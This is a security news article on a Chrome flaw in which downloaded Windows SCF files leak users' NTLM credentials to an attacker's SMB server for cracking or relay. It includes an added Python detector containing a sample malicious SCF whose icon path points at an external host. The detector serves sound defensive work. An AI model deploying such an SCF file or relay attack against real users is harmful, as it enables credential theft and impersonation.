A flaw in Google Chrome could allow criminals to infect a victim's machine with malware and steal Windows credentials. The flaw could also allow SMB relay attacks to be launched.
The flaw was discovered by Bosko Stankovic, security engineer at DefenseCode. In a blog post, he said that once a victim is duped into clicking on a malicious link in a Chrome browser window, the browser downloads a Windows Explorer Shell Command File (SCF). Chrome automatically deems such files safe.
The file does nothing until the download directory window is opened. The SCF then automatically tries to retrieve the icon associated with the file, and to do so the user's computer presents the user's credentials (user ID and password) to a remote server. In turn, this information is revealed to the hacker.
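As an added defensive example, not taken from the article or from DefenseCode, the following Python checks downloaded .scf files for an IconFile entry that points at a UNC path outside the local network, which is the condition under which Explorer would send the user's credentials to that host when the folder is opened. The trusted-host allowlist, the private-range rule and the sample file contents are constructed assumptions.

```python
import configparser
import re
from pathlib import Path

# Hosts allowed to serve icons over SMB (assumed allowlist; adjust per environment).
TRUSTED_HOSTS = {"fileserver.corp.example"}

# UNC path: \\host\share\...  (host may be a name or an IPv4 address)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# RFC 1918 and loopback ranges; anything else is treated as external
PRIVATE_HOST_RE = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|127\.)")


def icon_file_value(scf_text: str):
    """Return the [Shell] IconFile value, '' if absent, None if the file is not valid INI."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(scf_text)
    except configparser.Error:
        return None
    return cp.get("Shell", "IconFile", fallback="").strip()


def classify_scf(scf_text: str) -> str:
    """local: icon comes from a local file; internal: UNC host is trusted or private;
    suspicious: UNC host outside the network, so opening the folder would authenticate
    to it; unparseable: not valid INI (treat as suspicious as well)."""
    icon = icon_file_value(scf_text)
    if icon is None:
        return "unparseable"
    m = UNC_RE.match(icon)
    if not m:
        return "local"
    host = m.group(1).lower()
    if host in TRUSTED_HOSTS or PRIVATE_HOST_RE.match(host):
        return "internal"
    return "suspicious"


def scan_downloads(directory: Path) -> dict:
    """Classify every .scf file in a downloads folder before Explorer renders it."""
    return {p.name: classify_scf(p.read_text(errors="replace"))
            for p in directory.glob("*.scf")}


# Constructed samples: a normal "Show Desktop" SCF and one pointing at a TEST-NET address.
SAMPLE_LOCAL = "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
SAMPLE_EXTERNAL = "[Shell]\r\nCommand=2\r\nIconFile=\\\\203.0.113.5\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"

if __name__ == "__main__":
    for name, text in (("local", SAMPLE_LOCAL), ("external", SAMPLE_EXTERNAL)):
        print(name, "->", classify_scf(text))
```

Run it against a downloads folder with `scan_downloads(Path.home() / "Downloads")`; files classified as suspicious or unparseable are the ones to quarantine before the folder is opened in Explorer.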
“The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password,” said Stankovic.
He said that an attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit their website in order to proceed and reuse the victim's authentication credentials.
“Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources,” he added.
The credentials can also be used in an SMB relay attack.
"Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password."
Stankovic said he hoped that an update for Google Chrome would be rolled out to fix the issue. He added that Google had been notified of the problem.
Cal Leeming, convicted hacker and now CEO of Lyons Leeming, told SC Media UK that this was an interesting attack.
“The best mitigation we've seen for these attacks is to ensure SMB traffic is blocked externally, as mentioned by the author of this article. This can be done on a per host basis, but doing it at the network level (e.g. router or edge equipment) will likely be easier for most families and organisations,” he said.
Mark Wardlow, security consultant at SureCloud, told SC that the vulnerability still requires some level of user interaction and only affects Google Chrome. “However, with a carefully crafted webpage, it could be trivial to convince users to perform the necessary actions to trigger this particular attack. Organisations that do not control the installation of software or allow their user base to use Google Chrome are most at risk here,” he said.